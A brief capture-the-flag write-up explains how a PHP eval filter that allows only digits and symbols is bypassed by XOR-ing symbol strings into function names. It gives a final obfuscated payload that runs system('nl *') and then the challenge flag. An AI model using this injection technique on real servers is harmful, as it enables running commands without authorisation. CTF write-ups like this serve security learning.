Rating: 2.5
The main idea was just inject only numbers and symbols. I found this similar CTF [https://ctftime.org/writeup/25520](http://)
So basically, we can input xor between number and symbol produce strings. Example `(('-6-**3')^('^'))` -> "s". Then create payload `system("nl *")` from the xor result
Final payload : `(('-6-**3')^('^'.('^'^'10').'^^'.('^'^'10').'^'))(('02~'^'^^^').'*')`
Flag : `KCTF{sHoUlD_I_uSe_eVaL_lIkE_tHaT}`